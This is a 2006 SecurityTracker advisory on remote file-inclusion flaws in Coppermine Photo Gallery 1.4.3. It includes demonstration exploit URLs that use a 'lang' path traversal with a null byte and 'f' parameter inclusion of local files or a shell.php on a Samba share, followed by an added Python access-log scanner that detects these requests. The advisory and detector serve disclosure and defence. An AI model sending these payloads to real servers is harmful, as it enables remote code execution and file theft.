SecurityTracker.com
Category:   Application (Multimedia)  >   Coppermine Photo Gallery
Vendors:   DEMAR, Gregory
Coppermine Photo Gallery Include File Bugs in 'include/init.inc.php' and 'docs/showdoc.php' Let Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1015646
SecurityTracker URL:  http://securitytracker.com/id/1015646
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Feb 18 2006
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 1.4.3 and prior versions
Description:   rgod reported a vulnerability in Coppermine Photo Gallery. A remote user can execute arbitrary code on the target system.

The 'include/init.inc.php' script does not properly validate user-supplied input in the 'lang' parameter. A remote authenticated user can upload a file containing arbitrary code to the target system as part of the image upload feature. The remote user can then supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from the file. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided [using an example 'shell.zip' filename]:

http://[target]/[path]/thumbnails.php?lang=../albums/userpics/10002/shell.zip%00

The 'docs/showdoc.php' script does not properly validate user-supplied input in the 'f' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from the local system or from an accessible Samba server.

Some demonstration exploit URLs are provided:

http://[target]/[path]/docs/showdoc.php?f=c:\boot.ini

http://[target]/[path]/docs/showdoc.php?f=\\192.168.1.2\c\shell.php

If magic_quotes_gpc is enabled, additional slashes are required:

http://[target]/[path]/docs/showdoc.php?f=c:\\boot.ini

http://[target]/[path]/docs/showdoc.php?f=\\\\192.168.1.2\\c\\shell.php

A demonstration exploit is available at:

http://retrogod.altervista.org/cpg_143_incl_xpl.html

The original advisory is available at:

http://retrogod.altervista.org/cpg_143_adv.html
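
With no solution available at the time of this entry, one practical check is to search web server access logs for the request shapes described above. The following is an added example, not part of the original advisory or of Coppermine's code; the log lines, the /gallery/ path, and the rule that legitimate 'lang' and 'f' values are bare names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate 'lang' or 'f' value is a bare name, so "..",
# a path separator, a drive colon or a NUL byte marks the request as suspect.
SUSPECT = re.compile(r"\.\.|[/\\:\x00]")

def flagged_params(target):
    """Return [(param, decoded_value)] for suspect values in one request target."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1].lower()
    hits = []
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        # The advisory reaches include/init.inc.php through thumbnails.php, so
        # 'lang' is checked on any .php request (assumption); 'f' only on showdoc.php.
        watched = (
            (name == "lang" and script.endswith(".php"))
            or (name == "f" and script == "showdoc.php")
        )
        if watched and SUSPECT.search(value):
            hits.append((name, value))
    return hits

def scan(lines):
    """Return [(line_number, param, value)] for every suspect request in a log."""
    out = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if match:
            out.extend((number, p, v) for p, v in flagged_params(match.group(1)))
    return out

# Constructed sample log lines; request targets 2, 4 and 5 follow the advisory's URLs.
SAMPLE_LOG = [
    r'192.0.2.10 - - [18/Feb/2006:10:00:01 +0000] "GET /gallery/thumbnails.php?album=3&lang=english HTTP/1.1" 200 5120',
    r'192.0.2.44 - - [18/Feb/2006:10:02:17 +0000] "GET /gallery/thumbnails.php?lang=../albums/userpics/10002/shell.zip%00 HTTP/1.1" 200 312',
    r'192.0.2.10 - - [18/Feb/2006:10:03:40 +0000] "GET /gallery/docs/showdoc.php?f=index.htm HTTP/1.1" 200 8841',
    r'192.0.2.44 - - [18/Feb/2006:10:05:02 +0000] "GET /gallery/docs/showdoc.php?f=c:\boot.ini HTTP/1.1" 200 211',
    r'192.0.2.44 - - [18/Feb/2006:10:05:30 +0000] "GET /gallery/docs/showdoc.php?f=\\\\192.168.1.2\\c\\shell.php HTTP/1.1" 200 97',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The check reads only the query string recorded in the access log, and it decodes percent-encoding first so that %00 is matched as a NUL byte.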

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.
Solution:   No solution was available at the time of this entry.
Vendor URL:  coppermine-gallery.net/
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Coppermine Photo Gallery <=1.4.3 remote code execution (advisory & exploit)

http://retrogod.altervista.org/cpg_143_adv.html
http://retrogod.altervista.org/cpg_143_incl_xpl.html

rgod
 
 



Copyright 2021, SecurityGlobal.net LLC